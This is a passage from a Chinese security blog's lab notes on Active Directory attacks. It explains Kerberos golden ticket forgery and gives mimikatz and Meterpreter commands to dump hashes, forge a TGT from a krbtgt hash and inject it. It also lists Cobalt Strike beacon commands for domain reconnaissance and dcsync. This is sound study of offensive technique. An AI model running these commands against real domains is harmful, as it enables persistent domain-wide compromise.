<p>学习一下黄金票据的利用。在 Windows 的 kerberos 认证过程中，Client 将自己的信息发送给 KDC，然后 KDC 使用 krbtgt 用户的 Hash 作为密钥进行加密，生成 TGT 。那么如果获取到了 krbtgt 的 Hash 值，不就可以伪造任意的 TGT 了吗。<strong>因为 krbtgt 只有域控制器上面才有，所以使用黄金凭据意味着你之前拿到过域控制器的权限，黄金凭据可以理解为一个后门。</strong></p>
<p>主要满足以下条件：</p>
<ul>
<li>krbtgt 的 NTLM Hash</li>
<li>完整的域名和域SID</li>
<li>需要伪造的域管理员用户名</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # privilege::debug</span><br><span class="line">mimikatz # lsadump::lsa /patch</span><br><span class="line">mimikatz # kerberos::golden /admin:pursue /domain:hackbox.com /sid:S-1-5-21-2005268815-658469957-1189185684 /krbtgt:6f60ace6accbcb76078ccc0312174e98 /ticket:ticket.kirbi		# 生成黄金票据</span><br><span class="line">mimikatz # kerberos::ptt ticket.kirbi</span><br><span class="line"></span><br><span class="line">meterpreter &gt; kerberos_ticket_purge</span><br><span class="line">meterpreter &gt; golden_ticket_create -d hackbox.com -u pursue -s S-1-5-21-2005268815-658469957-1189185684 -k 6f60ace6accbcb76078ccc0312174e98 -t /tmp/krbtgt.ticket		# 生成黄金票据</span><br><span class="line">meterpreter &gt; kerberos_ticket_use /tmp/krbtgt.ticket</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230626125943601.png" alt="image-20230626125943601"></p>
<h2 id="cobaltstrike"><a href="#cobaltstrike" class="headerlink" title="cobaltstrike"></a>cobaltstrike</h2><p>主要记录一些命令，软件多操作几遍就熟悉了。</p>
<blockquote>
<p>将 ccache 转化为 kirbi：<a target="_blank" rel="noopener" href="https://github.com/rvazarkar/KrbCredExport">GitHub - rvazarkar&#x2F;KrbCredExport: Exports Kerberos KrbCred Tickets for use in Mimikatz&#x2F;Beacon from a Kerberos CCache File</a></p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./teamserver 192.168.8.129 123456</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">beacon&gt; </span><span class="language-bash">shell <span class="built_in">whoami</span></span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">beacon&gt; </span><span class="language-bash"><span class="built_in">help</span> net</span></span><br><span class="line"><span class="meta prompt_">beacon&gt; </span><span class="language-bash">net view</span></span><br><span class="line"><span class="meta prompt_">beacon&gt; </span><span class="language-bash">net domain</span></span><br><span class="line"><span class="meta prompt_">beacon&gt; </span><span class="language-bash">net computers</span></span><br><span class="line"><span class="meta prompt_">beacon&gt; </span><span class="language-bash">net dclist</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">beacon&gt; </span><span class="language-bash"><span class="built_in">link</span> dc</span></span><br><span class="line"><span class="meta prompt_">beacon&gt; </span><span class="language-bash">dcsync hackbox.com hackbox\krbtgt</span></span><br></pre></td></tr></table></figure>








      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/%E6%9A%97%E6%9C%88/" rel="tag"># 暗月</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2023/06/04/CTF/2023ciscn%E5%88%9D%E8%B5%9B/" rel="next" title="2023 ciscn 初赛">
                <i class="fa fa-chevron-left"></i> 2023 ciscn 初赛
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2023/07/15/Penetration/%E6%9A%97%E6%9C%88%E9%A1%B9%E7%9B%AE%E4%B8%83/" rel="prev" title="初探有防护的内网域渗透">
                初探有防护的内网域渗透 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/wechat.jpg"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">61</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">43</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/pursuezhou" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:pursuezhou@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.eonew.cn/" title="Ex" target="_blank">Ex</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xianbeil.github.io/" title="XianBei" target="_blank">XianBei</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://whoamianony.top/" title="WHOAMI" target="_blank">WHOAMI</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.e4l4.com/" title="E4L4" target="_blank">E4L4</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tokameine.top/" title="Tokameine" target="_blank">Tokameine</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://toleleyjl.github.io/" title="Tolele" target="_blank">Tolele</a>
                  </li>
                
              </ul>
            </div>
          

          <div class="wechat_OA">
    <br>
    <span>Welcome to my wechat</span>
    <p></p>
    <img src ="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/wechat.jpg" width="150" height="150">
</div>

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">2.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BD%91%E7%AB%99%E6%B5%8B%E8%AF%95"><span class="nav-number">3.</span> <span class="nav-text">网站测试</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E5%9F%9F%E6%B8%97%E9%80%8F"><span class="nav-number">4.</span> <span class="nav-text">内网域渗透</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cobaltstrike"><span class="nav-number">5.</span> <span class="nav-text">cobaltstrike</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>

  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Pursue</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
